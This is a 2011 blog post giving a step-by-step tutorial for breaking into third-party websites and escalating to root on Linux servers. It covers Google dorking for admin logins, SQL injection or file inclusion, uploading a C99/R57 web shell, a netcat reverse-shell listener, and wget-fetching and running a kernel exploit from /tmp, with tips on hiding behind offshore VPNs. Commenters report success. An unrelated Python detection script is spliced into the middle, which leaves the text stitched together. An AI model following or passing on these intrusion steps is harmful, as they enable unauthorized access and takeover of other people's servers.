
Root Exploit for Linux based server

Posted on Saturday, 10 December 2011 by Minhal Mehdi



    Requirements:
    • netcat
    • a decent shell to backconnect to your own machine
    • a little knowledge of Linux
    • offshore VPN, or some protection
    • brain

    Step 1: 
    Go to Google and use your favorite dork to find some decent site logins,
    e.g. inurl:login.asp or admin.asp or admin.php etc.

    I'll be using inurl:admin.asp
    It should look something like this:

    Step 2:
    Use SQLi or RFI or LFI or any other method you want to gain access to the site's login.
    Sometimes even basic SQLi is enough for you to gain access to the site and upload the shell :D
    I will not go into detail about how to gain access to the admin login, as this tutorial mainly focuses on showing how easy it is to find and run an exploit to become root.
    (Maybe sometime in the near future, when I have a lot of time, I'll explain the methods to upload the shell, as it is going to take a lot of time to explain.)
    OK, I found my site, found the admin login, and you know what, I even found an option to upload a page using the admin login (yeah yeah, I'm damn lucky).

    Step 3:
    Now that I have the upload option in front of me, I'll be uploading a shell through which I'll backconnect to my machine.
    You may use a C99 or R57 or any other shell, for that matter, which gives you the ability to backconnect.
    Using it you can easily do the thing which most people think is the best thing you can do after uploading a shell --> DEFACE ... :P .. but I am not interested in that. OK, I will continue with the next step :P ...

    I'll be using a basic shell because the only support we need is to backconnect to our machine.

    This is the shell (not created by me; I found it a long time back and have been using it since. Thanks to the person who created it.)

    Step 4:
    Now, before you remote connect to your local machine, if you are behind a router, you need to have an open port on your local machine to accept the connection from the site to your machine.
    Port forwarding is quite easy. You may go through portforwarding.com to do the settings according to your router,

    or better, just google port forwarding and you'll get all the info you need. :P (Because I could not find the settings for my router over there and had to google it :D)
    In my case it looks like this:

    I just logged in to my router, then went on to activate DMZ, and then went to virtual server and set up "1234" as my open port to point to my machine's private IP.
    And voila, it was done.


    Step 5:
    Now that you have an open port on your machine, all you need to do is set up netcat in listening mode using the cmd syntax >> nc -n -l -p 1234 -vv

    By the way, if you don't know, you can download netcat from: http://www.downloadnetcat.com/


    Step 6:

    Find out http://www.xxxxxx.com/YYY/shell.php or wherever the location of the shell is. If you have difficulty locating the shell, you may also use acunetix if you want to find it ;) ... as it gives you a complete directory view of the site, and that scan helps you find the uploaded shell location.

    Then open the site: http://www.xxxxxx.com/YYY/shell.php

    Go back to your netcat. It would look something like this:


    OK OK ... the uid is not root as of now... damn :'( :P .. OK OK ... we'll get there in some time.

    Step 7: From the above step you now know that the Linux version is 2.6.18.

    Now you can either go to exploit-db.com and search for 2.6.18, or directly google: 2.6.18 exploit
    So what I do is go to the /tmp folder and then type: wget -q securityfocus.com/data/vulnerabilities/exploits/2009-linux-sendpage3.tar.gz in the Linux window.
    Then I unwrap the file using tar -zxvf 2009*

    I'll get something like this:


    Step 8:
    Now cd into the downloaded exploit folder.
    It will look something like this:


    Step 9:
    Now we will run this exploit using:

    ./run
    It should look something like:

    Step 10:
    Now the final step --- type in: id to see who you are :D ...

    It should look something like this...

    And voila, you're root.

    And you all know what you can do when you are root ;) ... You're the king :)

    Hope this was helpful to at least some of you ...

    Let me know whether you liked it or not...

    written by : Meta1Wrath  aka Th3 R0oter


    Note: There are some errors below the post. Ignore them, and if any of you can fix them then contact me at minhalmehdi2000@gmail.com
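Steps 6 to 10 leave a recognisable trail in process-execution logs: the web server account spawns a shell, fetches and unpacks an archive in /tmp, runs a binary from /tmp, and a uid 0 process then appears beneath it. The following detection sketch is an added example, not part of the original post; the key=value record format, the uid 48 web account, the placeholder URL and the rule names are all assumptions made for illustration.

```python
import shlex

WEB_UIDS = {"48"}  # assumption: uid 48 is the web server account
WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
SHELLS = {"sh", "bash", "dash"}
STAGING_TOOLS = {"wget", "curl", "tar"}

# Constructed records in a simplified key=value form (not real auditd output).
SAMPLE = """\
pid=900 ppid=1 uid=48 exe=/usr/sbin/httpd cwd=/ argv="httpd"
pid=4101 ppid=900 uid=48 exe=/bin/sh cwd=/var/www/html argv="sh -i"
pid=4102 ppid=4101 uid=48 exe=/usr/bin/wget cwd=/tmp argv="wget -q http://files.example.invalid/a.tar.gz"
pid=4103 ppid=4101 uid=48 exe=/bin/tar cwd=/tmp argv="tar -zxvf a.tar.gz"
pid=4104 ppid=4101 uid=48 exe=/tmp/a/run cwd=/tmp/a argv="./run"
pid=4105 ppid=4104 uid=0 exe=/usr/bin/id cwd=/tmp/a argv="id"
pid=5000 ppid=1 uid=0 exe=/usr/sbin/crond cwd=/ argv="crond"
"""

def parse(line):
    """Split one record into a dict; shlex keeps the quoted argv together."""
    return dict(tok.split("=", 1) for tok in shlex.split(line))

def detect(log_text):
    """Return (pid, rule) pairs for the post-exploitation pattern in steps 6-10."""
    tainted, alerts = set(), []  # tainted: pids descended from the web account
    for line in filter(str.strip, log_text.splitlines()):
        ev = parse(line)
        name = ev["exe"].rsplit("/", 1)[-1]
        cwd = ev["cwd"].rstrip("/") + "/"
        if ev["uid"] in WEB_UIDS:
            tainted.add(ev["pid"])
            if name in SHELLS:
                alerts.append((ev["pid"], "shell-under-web-uid"))
            if name in STAGING_TOOLS and cwd.startswith(WRITABLE):
                alerts.append((ev["pid"], "staging-in-writable-dir"))
            if ev["exe"].startswith(WRITABLE):
                alerts.append((ev["pid"], "exec-from-writable-dir"))
        elif ev["uid"] == "0" and ev["ppid"] in tainted:
            # A web worker has no legitimate path to uid 0, so a root child
            # of a web-account process indicates privilege escalation.
            alerts.append((ev["pid"], "root-child-of-web-process"))
            tainted.add(ev["pid"])
    return alerts

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE):
        print(pid, rule)
```

Mounting /tmp with noexec and nosuid blocks the "exec-from-writable-dir" step outright, and keeping the kernel patched removes the escalation itself.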

    5 comments:

    Anonymous said...

    pls one video tutorial of c99 shell server root..

    Minhal Mehdi said...

    @Anonymous

    SQL Injection + Shell Upload Tutorial Video Tutorial

    http://www.devilscafe.in/2011/10/sql-injection-shell-upload-tutorial.html

    L0gical said...

    Thanks, got root!

    Minhal Mehdi said...

    Congrats @L0gical

    Anonymous said...

    ThanX alot ...
